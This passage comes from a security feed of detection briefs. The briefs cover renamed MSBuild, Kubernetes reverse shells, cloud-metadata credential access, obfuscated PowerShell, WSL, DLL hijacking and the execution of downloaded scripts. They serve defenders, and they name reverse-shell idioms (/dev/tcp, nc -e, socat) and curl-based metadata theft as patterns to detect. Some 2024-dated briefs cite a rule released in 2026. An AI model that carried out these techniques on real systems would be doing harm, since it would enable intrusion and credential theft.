The renaming of MSBuild can bypass standard application allowlisting and detection mechanisms.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation logging to capture the \u003ccode\u003eImage\u003c/code\u003e and \u003ccode\u003eOriginalFileName\u003c/code\u003e fields.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Microsoft Build Engine Using an Alternate Name\u0026rdquo; to your SIEM and tune for your environment to detect renamed MSBuild executables based on process metadata and command-line arguments.\u003c/li\u003e\n\u003cli\u003eMonitor process execution events for processes with \u003ccode\u003eOriginalFileName\u003c/code\u003e of \u0026ldquo;MSBuild.exe\u0026rdquo; and a different \u003ccode\u003eprocess.name\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of renamed executables, specifically those with an \u003ccode\u003eOriginalFileName\u003c/code\u003e of \u0026ldquo;MSBuild.exe.\u0026rdquo;\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-03-msbuild-renamed/","summary":"Attackers may rename the Microsoft Build Engine (MSBuild) executable to evade detection and proxy execution of malicious code.","title":"Microsoft Build Engine Executed After Renaming","url":"https://feed.craftedsignal.io/briefs/2024-01-03-msbuild-renamed/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Kubernetes"],"_cs_severities":["high"],"_cs_tags":["kubernetes","reverse_shell","execution","command_and_control"],"_cs_type":"advisory","_cs_vendors":["Elastic","Kubernetes"],"content_html":"\u003cp\u003eThis detection identifies attempts to establish reverse shells or bind shells within Kubernetes pods. 
The rule analyzes Kubernetes audit logs, specifically targeting \u003ccode\u003ekubectl exec\u003c/code\u003e commands where a user is attempting to execute commands inside a container. By decoding the URL-encoded command parameters and searching for known reverse shell patterns (e.g., usage of \u003ccode\u003e/dev/tcp\u003c/code\u003e, \u003ccode\u003enc -e\u003c/code\u003e, \u003ccode\u003esocat\u003c/code\u003e), the rule aims to detect unauthorized interactive access and command-and-control activity originating from compromised pods. This activity is often indicative of post-exploitation behavior, where an attacker seeks to gain persistent access to the Kubernetes cluster. The rule is based on the Elastic detection rule released on 2026-04-23. It is critical to investigate these alerts promptly, as successful reverse shell establishment can lead to data exfiltration, lateral movement within the cluster, and further compromise of sensitive resources.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Kubernetes cluster, potentially through a vulnerability in an application running within a pod, or by compromising a user\u0026rsquo;s credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ekubectl exec\u003c/code\u003e to execute a command within a target pod. 
The command is embedded within the \u003ccode\u003erequestURI\u003c/code\u003e parameter, URL-encoded to evade basic detection.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003erequestURI\u003c/code\u003e includes the \u003ccode\u003ecommand=\u003c/code\u003e parameter, followed by a string containing shell commands designed to initiate a reverse or bind shell.\u003c/li\u003e\n\u003cli\u003eThe malicious command utilizes utilities such as \u003ccode\u003enc\u003c/code\u003e, \u003ccode\u003esocat\u003c/code\u003e, or \u003ccode\u003ebash\u003c/code\u003e with redirection to \u003ccode\u003e/dev/tcp\u003c/code\u003e to establish a network connection back to the attacker\u0026rsquo;s controlled machine.\u003c/li\u003e\n\u003cli\u003eThe reverse shell connects back to the attacker, providing interactive command execution within the compromised pod.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the reverse shell to perform reconnaissance, discover sensitive information, and potentially escalate privileges within the pod.\u003c/li\u003e\n\u003cli\u003eThe attacker might attempt to move laterally to other pods or nodes within the cluster, leveraging stolen credentials or exploiting further vulnerabilities.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, which may include data exfiltration, deployment of malicious containers, or disruption of services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful reverse shell attack within a Kubernetes cluster can have severe consequences. Attackers can gain unauthorized access to sensitive data, compromise critical applications, and disrupt services. Lateral movement within the cluster can lead to widespread compromise, potentially affecting numerous pods and nodes. 
The lack of proper monitoring and alerting for \u003ccode\u003ekubectl exec\u003c/code\u003e commands can allow attackers to operate undetected for extended periods, increasing the potential for significant damage. The financial impact can range from tens of thousands to millions of dollars, depending on the severity of the breach and the value of the compromised data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Kubernetes Pod Exec Potential Reverse Shell\u0026rdquo; Sigma rule to your SIEM and tune for your environment to detect malicious \u003ccode\u003ekubectl exec\u003c/code\u003e commands.\u003c/li\u003e\n\u003cli\u003eEnable Kubernetes audit logging to capture \u003ccode\u003ekubectl exec\u003c/code\u003e events and ensure that the audit logs are ingested into your SIEM.\u003c/li\u003e\n\u003cli\u003eImplement network policies to restrict outbound connections from pods, limiting the ability of attackers to establish reverse shells.\u003c/li\u003e\n\u003cli\u003eMonitor Kubernetes audit logs for suspicious user activity, such as unusual API calls or access to sensitive resources.\u003c/li\u003e\n\u003cli\u003eRegularly review and update RBAC (Role-Based Access Control) policies to minimize the privileges assigned to users and service accounts, reducing the attack surface.\u003c/li\u003e\n\u003cli\u003eImplement the provided regex pattern in the Sigma rule within your existing detection logic, ensuring adequate coverage of reverse shell attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-kubernetes-pod-exec-reverse-shell/","summary":"This rule flags potential reverse shell activity via kubectl exec commands in Kubernetes pods by detecting specific shell and socket idioms within URL-decoded command payloads in Kubernetes audit logs, indicating post-exploitation interactive access 
and command-and-control.","title":"Kubernetes Pod Exec Potential Reverse Shell Activity Detected","url":"https://feed.craftedsignal.io/briefs/2024-01-kubernetes-pod-exec-reverse-shell/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["AWS IMDS","GCP Compute Metadata","Azure IMDS"],"_cs_severities":["high"],"_cs_tags":["kubernetes","cloud","credential_access","execution"],"_cs_type":"advisory","_cs_vendors":["AWS","Google","Azure"],"content_html":"\u003cp\u003eThis alert focuses on detecting Kubernetes pod exec sessions that attempt to access cloud instance metadata endpoints. The activity is flagged when the decoded command line of a pod exec session contains references to cloud instance metadata services across AWS, GCP, and Azure. Attackers may exploit this to harvest role credentials, tokens, or instance attributes from the underlying node or hypervisor. This is a high-risk behavior because it can expose short-lived cloud credentials to code running inside a container, particularly concerning in multi-tenant and regulated environments. 
This detection classifies the cloud target and whether the command indicates credential theft or reconnaissance.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to a Kubernetes cluster.\u003c/li\u003e\n\u003cli\u003eAttacker identifies a vulnerable pod within the cluster.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ekubectl exec\u003c/code\u003e to gain shell access to the pod.\u003c/li\u003e\n\u003cli\u003eInside the pod, the attacker crafts a command-line request targeting the cloud instance metadata service (IMDS) endpoint.\u003c/li\u003e\n\u003cli\u003eThe command, often using \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e, attempts to retrieve sensitive information such as IAM roles, tokens, or instance attributes.\u003c/li\u003e\n\u003cli\u003eThe IMDS responds with the requested data, which may include credentials or configuration details.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates the stolen credentials or uses them to escalate privileges within the cloud environment.\u003c/li\u003e\n\u003cli\u003eAttacker uses the harvested credentials to move laterally, compromise other cloud resources, or exfiltrate sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised credentials can lead to unauthorized access to sensitive data, lateral movement within the cloud environment, and potential data exfiltration. A successful attack could impact multiple organizations sharing the same Kubernetes cluster. 
The impact could include financial losses, reputational damage, and regulatory fines, depending on the type of data compromised and the extent of the breach.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eKubernetes Pod Exec IMDS Access\u003c/code\u003e to detect suspicious command-line activity within Kubernetes pods.\u003c/li\u003e\n\u003cli\u003eBlock access to the cloud instance metadata endpoints (169.254.169.254) from within Kubernetes pods using network policies.\u003c/li\u003e\n\u003cli\u003eRegularly review and tighten RBAC permissions related to \u003ccode\u003epods/exec\u003c/code\u003e to limit the ability of attackers to gain shell access.\u003c/li\u003e\n\u003cli\u003eMonitor cloud audit logs for suspicious STS or token issuance events correlated with Kubernetes pod exec events.\u003c/li\u003e\n\u003cli\u003eImplement workload identity solutions to avoid the need to expose instance metadata to pods.\u003c/li\u003e\n\u003cli\u003eBaseline approved images and tune exclusions narrowly to avoid false positives.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-kubernetes-metadata-access/","summary":"Detection of Kubernetes pod exec sessions accessing cloud instance metadata endpoints, indicating potential credential theft from AWS, GCP, or Azure.","title":"Kubernetes Pod Exec Cloud Instance Metadata Access","url":"https://feed.craftedsignal.io/briefs/2024-01-kubernetes-metadata-access/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["high"],"_cs_tags":["defense-evasion","execution","powershell","obfuscation"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers leverage Invoke-Obfuscation, a popular PowerShell obfuscation framework, to generate highly obfuscated IEX 
(Invoke-Expression) commands. This technique allows them to bypass traditional signature-based detections and execute malicious payloads on targeted systems. Invoke-Obfuscation is designed to make PowerShell code difficult to read and analyze, thus hindering security analysts and automated detection systems. The obfuscation techniques include string concatenation using environment variables, character code manipulation, and other methods to mask the true intent of the script. This activity has been observed across various campaigns, typically targeting Windows environments where PowerShell is widely used. Defenders should be aware of this technique and implement robust detection mechanisms to identify and block obfuscated PowerShell execution.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial Access: An attacker gains initial access to the target system through methods such as phishing or exploiting a software vulnerability.\u003c/li\u003e\n\u003cli\u003ePayload Delivery: The attacker uploads a malicious PowerShell script or downloads it from a remote server.\u003c/li\u003e\n\u003cli\u003eObfuscation: The attacker uses Invoke-Obfuscation to obfuscate the PowerShell script, making it difficult to analyze. This can involve techniques like string concatenation using \u003ccode\u003e$PSHome\u003c/code\u003e or \u003ccode\u003e$ShellId\u003c/code\u003e, or using complex variable manipulations.\u003c/li\u003e\n\u003cli\u003eExecution: The attacker executes the obfuscated PowerShell script using \u003ccode\u003epowershell.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eIEX Invocation: The obfuscated script leverages \u003ccode\u003eIEX\u003c/code\u003e (Invoke-Expression) to dynamically execute code, further hindering detection. 
The obfuscated strings are deobfuscated at runtime within the IEX context.\u003c/li\u003e\n\u003cli\u003ePersistence (Optional): The attacker may establish persistence by creating scheduled tasks or modifying registry keys.\u003c/li\u003e\n\u003cli\u003eLateral Movement (Optional): The attacker may use the compromised system as a launching point for lateral movement within the network, using tools like \u003ccode\u003ePsExec\u003c/code\u003e or \u003ccode\u003eWinRM\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eObjective: The ultimate objective could be data exfiltration, ransomware deployment, or establishing a long-term foothold for espionage.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary code on the compromised system, leading to various malicious activities such as data theft, system compromise, and ransomware deployment. The use of Invoke-Obfuscation makes detection more challenging, potentially allowing attackers to remain undetected for extended periods. 
This can result in significant financial losses, reputational damage, and operational disruption.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eInvoke-Obfuscation Obfuscated IEX Invocation\u003c/code\u003e to your SIEM to detect obfuscated IEX commands generated by Invoke-Obfuscation.\u003c/li\u003e\n\u003cli\u003eMonitor PowerShell execution logs for suspicious command-line arguments that resemble obfuscation patterns described in the Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement PowerShell Constrained Language Mode to restrict the capabilities of PowerShell and limit the effectiveness of obfuscation techniques.\u003c/li\u003e\n\u003cli\u003eEnable and review PowerShell Script Block Logging to capture the content of executed scripts, allowing for more in-depth analysis of malicious activity.\u003c/li\u003e\n\u003cli\u003eRegularly update your endpoint detection and response (EDR) solutions to ensure they have the latest signatures and behavioral detection capabilities.\u003c/li\u003e\n\u003cli\u003eEducate users about the risks of phishing and other social engineering attacks that may be used to deliver malicious PowerShell scripts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-invoke-obfuscation-iex/","summary":"Attackers use Invoke-Obfuscation, a PowerShell obfuscation framework, to generate obfuscated IEX (Invoke-Expression) commands, evading detection and executing malicious code.","title":"Invoke-Obfuscation Obfuscated IEX Invocation via PowerShell","url":"https://feed.craftedsignal.io/briefs/2024-01-invoke-obfuscation-iex/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Windows Subsystem for Linux","Elastic Defend","SentinelOne Cloud 
Funnel"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","windows","wsl"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThis rule detects attempts to execute programs on the host from the Windows Subsystem for Linux (WSL). Adversaries may enable and use WSL for Linux to avoid detection by executing malicious scripts or binaries, bypassing traditional Windows security mechanisms. The rule identifies suspicious executions initiated by WSL processes, excluding known safe executables, to flag potential misuse for defense evasion. This detection focuses on identifying when a process is spawned by \u003ccode\u003ewsl.exe\u003c/code\u003e or \u003ccode\u003ewslhost.exe\u003c/code\u003e and is not within a known good path. The rule is designed to work with data from Elastic Defend, Crowdstrike, Microsoft Defender XDR, SentinelOne Cloud Funnel, Sysmon, and Windows Security Event Logs.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system.\u003c/li\u003e\n\u003cli\u003eThe attacker enables the Windows Subsystem for Linux (WSL).\u003c/li\u003e\n\u003cli\u003eThe attacker transfers or creates malicious scripts or binaries within the WSL environment.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the malicious script or binary using a Linux shell within WSL, such as bash.\u003c/li\u003e\n\u003cli\u003eThe WSL environment interacts with the Windows host to execute commands or access resources.\u003c/li\u003e\n\u003cli\u003eThe executed commands perform malicious actions, such as data exfiltration or lateral movement.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages WSL\u0026rsquo;s integration with Windows to evade traditional Windows-based security measures.\u003c/li\u003e\n\u003cli\u003eThe final objective is to compromise the system or network while remaining 
undetected.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows adversaries to execute malicious code while potentially evading traditional Windows-based security measures. This can lead to system compromise, data theft, or further propagation of malware within the network. The rule\u0026rsquo;s \u003ccode\u003emedium\u003c/code\u003e severity reflects the potential for significant impact, necessitating prompt investigation and response.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eExecution via Windows Subsystem for Linux\u003c/code\u003e to your SIEM to detect potential malicious activity originating from WSL.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) or Windows process creation logs to provide the necessary data for the Sigma rule to function.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on identifying the executed process, parent process (\u003ccode\u003ewsl.exe\u003c/code\u003e or \u003ccode\u003ewslhost.exe\u003c/code\u003e), and associated user account.\u003c/li\u003e\n\u003cli\u003eCorrelate alerts with other security events from Microsoft Defender XDR, SentinelOne, or Crowdstrike to identify related suspicious activities or patterns.\u003c/li\u003e\n\u003cli\u003eImplement exceptions for known administrative scripts or development tools that are frequently executed via WSL to reduce false positives, as outlined in the rule\u0026rsquo;s analysis.\u003c/li\u003e\n\u003cli\u003eMonitor the WSL configuration and installed Linux distributions on affected systems to identify unauthorized changes or installations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-wsl-child-process-execution/","summary":"This 
detection identifies attempts to execute programs from the Windows Subsystem for Linux (WSL) to evade detection by flagging suspicious executions initiated by WSL processes and excluding known safe executables.","title":"Execution via Windows Subsystem for Linux","url":"https://feed.craftedsignal.io/briefs/2024-01-wsl-child-process-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["M365 Defender","Elastic Defend","CrowdStrike FDR","SentinelOne Cloud Funnel","Sysmon"],"_cs_severities":["medium"],"_cs_tags":["execution","defense-evasion","dll-hijacking"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Crowdstrike","SentinelOne","Elastic"],"content_html":"\u003cp\u003eThis detection identifies potential abuse of the Windows Side-by-Side (SxS) feature to execute malicious code. Attackers can place a malicious DLL file within an application\u0026rsquo;s local SxS folder (application.exe.local) and trick the Windows module loader into prioritizing it over legitimate system DLLs. This technique, known as DLL hijacking or DLL redirection, allows adversaries to gain arbitrary code execution within the context of the targeted application. This technique may be used to bypass security controls, escalate privileges, or establish persistence. 
The detection focuses on file events related to DLLs within these specific SxS folders.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to the system (e.g., via phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker identifies a legitimate application with an associated SxS folder (application.exe.local).\u003c/li\u003e\n\u003cli\u003eThe attacker creates or modifies a malicious DLL file.\u003c/li\u003e\n\u003cli\u003eThe attacker places the malicious DLL file in the application\u0026rsquo;s SxS folder (application.exe.local).\u003c/li\u003e\n\u003cli\u003eA legitimate application attempts to load a DLL.\u003c/li\u003e\n\u003cli\u003eDue to the presence of the malicious DLL in the SxS folder, the Windows module loader prioritizes the attacker\u0026rsquo;s DLL.\u003c/li\u003e\n\u003cli\u003eThe malicious DLL is loaded and executed by the application.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves code execution within the context of the application.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to arbitrary code execution within the targeted application\u0026rsquo;s context. This can result in privilege escalation, data theft, system compromise, or the establishment of persistence mechanisms. 
While the number of directly affected organizations is unknown, this technique can be used against a wide range of applications on Windows systems.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor file creation events for DLL files in \u003ccode\u003eC:\\*\\*.exe.local\\*.dll\u003c/code\u003e and \u003ccode\u003e\\\\Device\\\\HarddiskVolume*\\\\*\\\\*.exe.local\\\\*.dll\u003c/code\u003e using the provided Sigma rule to detect potential malicious DLL planting.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 11 (File Create) to improve visibility into file creation events, as noted in the \u003ca href=\"https://ela.st/sysmon-event-11-setup\"\u003esetup instructions\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule to determine the legitimacy of the DLL creation event and the involved application.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-03-local-sxs-dll-execution/","summary":"This rule detects the creation, modification, or deletion of DLL files within Windows SxS local folders, which could indicate an attempt to execute malicious payloads by abusing shared module loading.","title":"Execution via Local SxS Shared Module","url":"https://feed.craftedsignal.io/briefs/2024-01-03-local-sxs-dll-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["execution","windows","scripting","threat-detection"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection rule identifies a common attack vector where adversaries download and execute malicious scripts on Windows systems. 
The rule focuses on detecting scripts (e.g., .js, .vbs, .ps1, .msi) that originate from internet sources (identified by the presence of \u003ccode\u003efile.origin_url\u003c/code\u003e or \u003ccode\u003efile.origin_referrer_url\u003c/code\u003e ) and are subsequently executed using scripting utilities. The rule specifically looks for file creations by web browsers and archive utilities (chrome.exe, msedge.exe, winrar.exe, 7zFM.exe, etc.) followed by execution of script interpreters (wscript.exe, cscript.exe, powershell.exe, mshta.exe, msiexec.exe) with command-line arguments referencing the downloaded script. This activity is often indicative of malicious intent, as legitimate scripts are typically sourced from trusted internal repositories or local file systems, and not directly downloaded and executed. The rule aims to detect suspicious parent-child process relationships (e.g., browser spawning a script interpreter) and identify potential initial access or execution attempts. The rule requires Elastic Defend and a minimum Elastic Stack version of 9.2.0.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user browses to a malicious website or opens a compromised email containing a link.\u003c/li\u003e\n\u003cli\u003eThe user clicks the link, which initiates a download of a malicious script file (e.g., .js, .vbs, .ps1, .msi) via a web browser (chrome.exe, msedge.exe).\u003c/li\u003e\n\u003cli\u003eThe browser saves the downloaded script file to the user\u0026rsquo;s Downloads folder.\u003c/li\u003e\n\u003cli\u003eThe user, either intentionally or through social engineering, executes the downloaded script.\u003c/li\u003e\n\u003cli\u003eWindows executes the script using a scripting utility like wscript.exe, cscript.exe, powershell.exe, mshta.exe, or msiexec.exe.\u003c/li\u003e\n\u003cli\u003eThe scripting utility executes the malicious code within the script, potentially establishing persistence, downloading 
additional payloads, or performing reconnaissance.\u003c/li\u003e\n\u003cli\u003eThe script may attempt to elevate privileges or bypass security controls to gain further access to the system.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as deploying ransomware, stealing sensitive data, or establishing a remote access backdoor.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to a variety of negative outcomes, including malware infection, data theft, and system compromise. If the downloaded script is malicious, it can allow attackers to gain a foothold on the system, escalate privileges, and move laterally within the network. This can result in significant financial losses, reputational damage, and disruption of business operations. The number of victims and affected sectors can vary depending on the scale and scope of the attack.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Elastic Defend integration to collect necessary event data, as described in the \u003ca href=\"https://ela.st/install-elastic-defend\"\u003esetup instructions\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Execution of a Downloaded Windows Script\u0026rdquo; to your SIEM and tune for your environment to detect the execution of downloaded scripts.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging and file creation events to provide the necessary data for the Sigma rules to function correctly.\u003c/li\u003e\n\u003cli\u003eImplement application whitelisting to restrict the execution of unauthorized scripts and scripting utilities to reduce the risk of similar threats in the future, as mentioned in the \u0026ldquo;Response and remediation\u0026rdquo; section.\u003c/li\u003e\n\u003cli\u003eBlock known malicious domains and URLs identified in related threat intelligence 
feeds to prevent users from downloading malicious scripts in the first place.\u003c/li\u003e\n\u003cli\u003eEducate users about the dangers of downloading and executing untrusted scripts from the internet, as this is a common initial access vector.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-downloaded-script-execution/","summary":"This rule identifies the creation and subsequent execution of a Windows script downloaded from the internet, a technique used by adversaries for initial access and execution on Windows systems.","title":"Execution of a Downloaded Windows Script","url":"https://feed.craftedsignal.io/briefs/2024-01-downloaded-script-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["defense-evasion","persistence","privilege-escalation","execution","temp-directory","file-creation"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis threat brief focuses on the creation of executable files or scripts within temporary directories on Windows systems, a common tactic used by adversaries to bypass security controls and establish persistence. This behavior is often indicative of malicious activity, such as malware installation, privilege escalation, or unauthorized code execution. The observed activity involves writing files with extensions like \u003ccode\u003e.exe\u003c/code\u003e, \u003ccode\u003e.dll\u003c/code\u003e, \u003ccode\u003e.ps1\u003c/code\u003e, and \u003ccode\u003e.bat\u003c/code\u003e into common temporary locations like \u003ccode\u003e\\Windows\\Temp\\\u003c/code\u003e or \u003ccode\u003e\\AppData\\Local\\Temp\\\u003c/code\u003e. This technique allows attackers to hide malicious files among legitimate temporary files, making detection more challenging. 
References to campaigns like Volt Typhoon, and ransomware families like LockBit highlight the importance of detecting this behavior.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to the system (e.g., through phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker drops a malicious executable or script onto the compromised system.\u003c/li\u003e\n\u003cli\u003eTo evade detection, the malicious file is created in a temporary directory such as \u003ccode\u003eC:\\Windows\\Temp\\\u003c/code\u003e or \u003ccode\u003eC:\\Users\\\u0026lt;username\u0026gt;\\AppData\\Local\\Temp\\\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a dropper or installer to write the malicious file (e.g., using \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker may rename the file to further disguise its purpose.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the malicious file, potentially leading to code execution, privilege escalation, or persistence.\u003c/li\u003e\n\u003cli\u003eThe executed malware performs malicious actions, such as lateral movement, data exfiltration, or ransomware deployment.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistence on the system, ensuring continued access and control.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized code execution, privilege escalation, and persistent access within the targeted environment. This can result in data theft, system compromise, or ransomware deployment. The references to campaigns like Volt Typhoon and ransomware families like LockBit highlight the potential for significant disruption and financial loss. 
Multiple analytic stories, such as AsyncRAT, DarkGate Malware, and Qakbot, highlight the prevalence of this technique across various threat actors.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon EventID 11 (FileCreate) logging to monitor file creation events on endpoints.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Executable or Script Creation in Temp Path\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate any file creation events in temporary directories involving executable or script file types (.exe, .dll, .ps1, .bat, etc.).\u003c/li\u003e\n\u003cli\u003eReview and filter events based on your organization\u0026rsquo;s normal activity to reduce false positives, as mentioned in the \u0026ldquo;known_false_positives\u0026rdquo; section of the source.\u003c/li\u003e\n\u003cli\u003eMonitor for processes spawned from temporary directories, using a process creation monitoring tool and correlate with other suspicious activities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-executables-or-script-creation-in-temp-path/","summary":"Adversaries may create executables or scripts in temporary directories to evade detection, maintain persistence, and execute unauthorized code on Windows systems.","title":"Executable or Script Creation in Temporary Paths","url":"https://feed.craftedsignal.io/briefs/2024-01-executables-or-script-creation-in-temp-path/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Exchange","Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["collection","execution","powershell","exchange","mailbox"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eAttackers may target user email to collect sensitive 
